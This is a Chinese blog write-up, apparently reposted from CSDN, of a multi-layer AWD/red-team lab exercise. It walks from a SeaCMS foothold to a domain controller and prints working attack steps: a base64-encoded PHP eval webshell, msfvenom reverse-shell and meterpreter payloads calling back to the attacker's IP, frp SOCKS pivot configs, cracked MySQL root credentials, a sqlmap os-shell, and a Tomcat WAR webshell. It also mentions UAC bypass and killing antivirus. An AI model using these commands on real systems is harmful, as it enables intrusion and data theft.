|
|
原文链接:一次A公司的11月AWD实战记录
前言
作者的博客 https://blog.csdn.net/qq_45290991/article/details/121126349
最近真的很忙,老板不仅要我们加班,还不给钱,整天吹嘘996是福报,我已经决定要跳槽了,我觉得以后去当红队打hvv也不错。要么就去s,要么安fu,反正是真的不想在这种垃圾公司荒废人生了……一个工控的ctf,一个安全比赛,还有就是这个duikang,这个只能kali,就很限制,环境我准备的很不好……只给了2个提示,1.要从10.2.2.97进去,2.最后是一个三层网络8个flag要拿下dc,flag其实还是次要的,主要是dc.恶心的地方是,这个网有自重启动和防护能力,每过一段时间刷新后门全部没掉……所以免杀和安防还有规避检测花了很大功夫……最后按理来说,是能够在不被发现的情况下拿下最后一层的东西的……
一、外网打点先用oopenconnect连接进去
 
分配本机ip:
Password:
POST https://183.129.189.62:4434/auth
得到了CONNECT响应:HTTP/1.1200 CONNECTED
CSTP 已连接。DPD90,持久连接(Keepalive)32400
Connectedas 10.2.1.83, using SSL, with DTLS in progress
DTLS握手失败:资源临时不可用,请重试。
nmap扫描,发现10.2.2.97开着22和80,hydra爆破不出来22,访问80,发现是海洋cms
whatweb探测:无法得到详细版本,只能一个一个测试……
whatweb 10.2.2.97
http://10.2.2.97[200 OK] Apache[2.4.7], Bootstrap[3.3.5], Country[RESERVED][ZZ],HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.7 (Ubuntu)],IP[10.2.2.97], JQuery[1.11.3], PHP[5.5.9-1ubuntu4.25], Script,Title[海洋CMS],X-Powered-By[PHP/5.5.9-1ubuntu4.25], X-UA-Compatible[IE=edge]
找了很多海洋cms的漏洞利用,这篇文章不错:
Seacms漏洞_Grey的博客-CSDN博客_seacms漏洞
探测信息发现了很奇怪的信息,怀疑做了反向代理,因为ifconfig测出来ip不是10.2.2.97,而是10.20.20.31
 
拿下一个flag:
开始写shell,发现貌似
system('echo(一句话木马)>shell.php')
写不进去,然后想着是nc或者wget,sc下载本地msf木马,但是貌似不太行,那只能写shell了。听大表哥说是6.53版本限制了rce的长度,一般用这两个方法写shell:
说实话下图这个poc我是真的想不到
 
华丽的分割线
由于网络变化,本机ip变为10.2.0.19 ,第一个目标变为10.2.2.16
我这里用的是第一张图片写的shell,发现居然之前大表哥可以我不行……果然自己还是菜鸡用echo写吧(o(╥﹏╥)o)。写shell如下:
蚁剑连接getshell:居然返回数据为空!!!!!我惊呆了,明明已经写进去一句话木马了呀!检查之后发现post函数被过滤了!我tm居然这里有个waf!那怎么办?绕过呗。。。参考:
渗透tip-----命令执行写入webshell- Shadown-PQ - 博客园
echo "PD9waHAgZXZhbCgkX1BPU1RbMV0pOyA/Pg==" | base64 -d >2.php
二、第一层内网横移10.10.20基本信息收集
当前ip是10.10.20.31,(网络变化了所以ip变动,这次我确信是反向代理了,本地还开了3306,但是外网nmap扫不到,可能是白名单了或者waf,ps查看进程发现没什么杀软貌似……)
msf反弹shell进去(有条件可以免杀)
msfvenom -p linux/x64/shell/reverse_tcp lhost=10.2.0.19 lport=4444 -f elf -o shell
use exploit/multi/handler
第一次生成shell无法得到交互式meterpreter,换payload继续:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.2.0.19 LPORT=4445 -felf > shell2.elf
Activesessions
===============
Noactive sessions.
- msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
- payload =>linux/x64/meterpreter/reverse_tcp
- msf5 exploit(multi/handler) >set lhost 10.2.0.19
- lhost => 10.2.0.19
- msf5 exploit(multi/handler) > set lport 4445
- lport => 4445
- msf5 exploit(multi/handler) >run
派生到cs,但是猛然发现cs上线linux主机比较麻烦……frpc流量特征明显,于是想着直接免杀fscan扫描……
fscan -h 10.10.20.0/24 很好这个时候又无回显,存到一个txt里面吧!-o1.txt
然后动作太大(或许是网络原因),链接断了,我想不会我被发现了吧!
- 10.10.20.1:80open
- 10.10.20.1:22 open
- 10.10.20.31:80open
- 10.10.20.166:3306 open
- 10.10.20.100:80open
- 10.10.20.231:3306 open
- 10.10.20.88:8009open
- 10.10.20.88:8080 open
- [+] mysql:10.10.20.166:3306:root123456
- [+] mysql:10.10.20.231:3306:root 123456
- [*]WebTitle:http://10.10.20.1 code:200 len:9 title:海洋CMS
- [*]WebTitle:http://10.10.20.31 code:200 len:9 title:海洋CMS
- [*]WebTitle:http://10.10.20.100 code:200 len:12 title:后台系统
- [*]WebTitle:http://10.10.20.88:8080 code:200 len:20 title:Apache Tomcat/8.0.43
- 发现2台机子有点意思:
- [+]mysql:10.10.20.166:3306:root 123456
- [+]mysql:10.10.20.231:3306:root 123456
直接访问不通,这个时候只能代理了……frpc的两个配置文件如下:
- [common]
- bind_addr= 0.0.0.0
- bind_port = 7000
- dashboard_addr =0.0.0.0
- dashboard_port = 7001
- dashboard_user =root
- dashboard_pwd = 123456
- token = 00253c8fcf9ae01
- frpc
- [common]
- server_addr= 10.2.0.19
- server_port = 7000
- token =00253c8fcf9ae01
- pool_count = 5
- health_check_type =tcp
- health_check_interval_s = 100
- [test]
- remote_port =12345
- plugin = socks5
- use_encryption = true
- use_compression= true
- plugin_user = admin
- plugin_passwd = 123456
proxychains设置
 nmap验证代理是否有效:有效3306开了
- cobaltstrike-4.3$proxychains nmap 10.10.20.166
- ProxyChains-3.1(http://proxychains.sf.net)
- Starting Nmap 7.80 (https://nmap.org ) at 2021-11-04 18:45CST
- |S-chain|-<>-127.0.0.1:12345-<><>-10.10.20.166:80-<--timeout
- |S-chain|-<>-127.0.0.1:12345-<><>-10.10.20.166:587-<--timeout
- |S-chain|-<>-127.0.0.1:12345-<><>-10.10.20.166:8080-<--timeout
- |S-chain|-<>-127.0.0.1:12345-<><>-10.10.20.166:143-<--timeout
- |S-chain|-<>-127.0.0.1:12345-<><>-10.10.20.166:53-<--timeout
- |S-chain|-<>-127.0.0.1:12345-<><>-10.10.20.166:554-<--timeout
- |S-chain|-<>-127.0.0.1:12345-<><>-10.10.20.166:1720-<--timeout
- |S-chain|-<>-127.0.0.1:12345-<><>-10.10.20.166:3306-<><>-OK
- |S-chain|-<>-127.0.0.1:12345-<><>-10.10.20.166:445-<--timeout
- |S-chain|-<>-127.0.0.1:12345-<><>-10.10.20.166:113-<--timeout
- |S-chain|-<>-127.0.0.1:12345-<><>-10.10.20.166:995-<--timeout
- 代理mysql无痕登录10.10.20.231 mysql -h localhost -u root -p
- 发现root的密码hash,破解之:
- MySQL[mysql]> select * fromuser;
- +--------------+------+-------------------------------------------+-------------+-------------+-------------+-------------+-------------+-----------+-------------+---------------+--------------+-----------+------------+-----------------+------------+------------+--------------+------------+-----------------------+------------------+--------------+-----------------+------------------+------------------+----------------+---------------------+--------------------+------------------+------------+--------------+------------------------+----------+------------+-------------+--------------+---------------+-------------+-----------------+----------------------+--------+-----------------------+
- |Host | User |Password | Select_priv | Insert_priv | Update_priv | Delete_priv | Create_priv| Drop_priv | Reload_priv | Shutdown_priv | Process_priv | File_priv| Grant_priv | References_priv | Index_priv | Alter_priv |Show_db_priv | Super_priv | Create_tmp_table_priv | Lock_tables_priv| Execute_priv | Repl_slave_priv | Repl_client_priv |Create_view_priv | Show_view_priv | Create_routine_priv |Alter_routine_priv | Create_user_priv | Event_priv | Trigger_priv |Create_tablespace_priv | ssl_type | ssl_cipher | x509_issuer |x509_subject | max_questions | max_updates | max_connections |max_user_connections | plugin | authentication_string|
- +--------------+------+-------------------------------------------+-------------+-------------+-------------+-------------+-------------+-----------+-------------+---------------+--------------+-----------+------------+-----------------+------------+------------+--------------+------------+-----------------------+------------------+--------------+-----------------+------------------+------------------+----------------+---------------------+--------------------+------------------+------------+--------------+------------------------+----------+------------+-------------+--------------+---------------+-------------+-----------------+----------------------+--------+-----------------------+
- |localhost | root |*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 | Y | Y |Y |Y |Y |Y | Y | Y | Y | Y | Y | Y | Y |Y |Y |Y |Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y |Y |Y | | | | | 0 | 0| 0 | 0 | | |
- | 9d231610406a | root |*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 | Y | Y |Y |Y |Y |Y | Y | Y | Y | Y | Y | Y | Y |Y |Y |Y |Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y |Y |Y | | | | | 0 | 0| 0 | 0 | | |
- | 127.0.0.1 | root |*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 | Y | Y |Y |Y |Y |Y | Y | Y | Y | Y | Y | Y | Y |Y |Y |Y |Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y |Y |Y | | | | | 0 | 0| 0 | 0 | | |
- | ::1 |root | *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 | Y | Y |Y |Y |Y |Y | Y | Y | Y | Y | Y | Y | Y |Y |Y |Y |Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y |Y |Y | | | | | 0 | 0| 0 | 0 | | |
- | localhost | | | N |N |N |N |N |N | N | N | N | N | N | N | N |N |N |N |N | N | N | N | N | N | N | N | N | N | N |N |N | | | | | 0 | 0| 0 | 0 | | NULL |
- | 9d231610406a | | | N |N |N |N |N |N | N | N | N | N | N | N | N |N |N |N |N | N | N | N | N | N | N | N | N | N | N |N |N | | | | | 0 | 0| 0 | 0 | | NULL |
- | % | root | *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 | Y | Y |Y |Y |Y |Y | Y | Y | Y | Y | Y | Y | Y |Y |Y |Y |Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y |Y |Y | | | | | 0 | 0| 0 | 0 | | NULL |
- +--------------+------+-------------------------------------------+-------------+-------------+-------------+-------------+-------------+-----------+-------------+---------------+--------------+-----------+------------+-----------------+------------+------------+--------------+------------+-----------------------+------------------+--------------+-----------------+------------------+------------------+----------------+---------------------+--------------------+------------------+------------+--------------+------------------------+----------+------------+-------------+--------------+---------------+-------------+-----------------+----------------------+--------+-----------------------+
- 7rows ins__H__
- ___ ___[']_____ ___ ___ {
sqlmap -d getshell的方法:[猥琐姿势]利用MySQL的root账号从而快速GetShell- 知乎
- proxychains sqlmap -d "mysql://root:123456@10.10.20.231:3306/mysql" -f
- [*]starting @ 19:12:24 /2021-11-04/
- |S-chain|-<>-127.0.0.1:12345-<><>-10.10.20.231:3306-<><>-OK
- [19:12:30][INFO] connection to MySQL server '10.10.20.231:3306'established
- [19:12:30] [INFO] testing MySQL
- [19:12:30][INFO] resumed: [['1']]...
- [19:12:30] [INFO] confirmingMySQL
- [19:12:30] [INFO] resumed: [['1']]...
- [19:12:31][INFO] the back-end DBMS is MySQL
- [19:12:31] [INFO] activelyfingerprinting MySQL
- [19:12:32] [INFO] executing MySQL commentinjection fingerprint
- back-end DBMS: active fingerprint: MySQL>= 5.5
- comment injection fingerprint: MySQL 5.5.23
- [19:12:47] [INFO]connection to MySQL server '10.10.20.231:3306' closed
版本5.5.23的mysql,进去后发现权限低的可怜mysql权限,想着能不能提权udf或者mof,但是在/tmp下就有一个flag8.txt- ---
- os-shell>ls /tmp
- do you want to retrieve the command standard output?[Y/n/a] y
- command standardoutput:
- ---
- flag8.txt
- mysql.sock
- ---
- os-shell>cat /tmp/flag8.txt
- do you want to retrieve the command standardoutput? [Y/n/a] y
- command standard output:'14326d7730ff9838e1e5e2a778028356'
Mysql-UDF提权_告白的博客-CSDN博客_udf提权MySQL漏洞利用与提权|国光
弱口令就是tomcat,密码是TOMCAT123,实在是懒得手动提权了,大表哥直接人工给密码
现在最恶心的地方到了!
我居然无法用proxychains代理火狐!别的curl,nmap都可以,就是火狐不行,就算浏览器手动设置了socks5代理走12345端口,也无法访问tomcat的10.10.20.88:8080,那么我该如何拿到10.10.20.88的shell呢??就离谱,离大普……一模一样的步骤和环境……唉……
登录tomcat之后war部署上传一个jsp大马
三、第二层内网核心区域 打下tomacat之后,二级代理,进入后用nmap扫描,这次就相对没有那么恶心了,普通的内网主机攻击思路,因为各种原因,最后一层的内网不能再写了,,先这样子,,整理思路:
kali------->cms(DMZ)------>mysql(内网1发现密码)---->tomcat(内网1)------->winserver(内网2拿到最终答案)
这里还有一个技巧就是改主机的名字,不容易被日志发现,但是其实也没差……
wins要考虑绕过powershell的bypass策略uac,可以写一个ps1文件然后执行,去绕过
由于杀软我实在绕不过去,于是放弃长期空守,直接kill……我想会不会是这个原因一直导致我被踢出来……
2
关注公众号
|
|
发表于 2021-11-6 15:09:27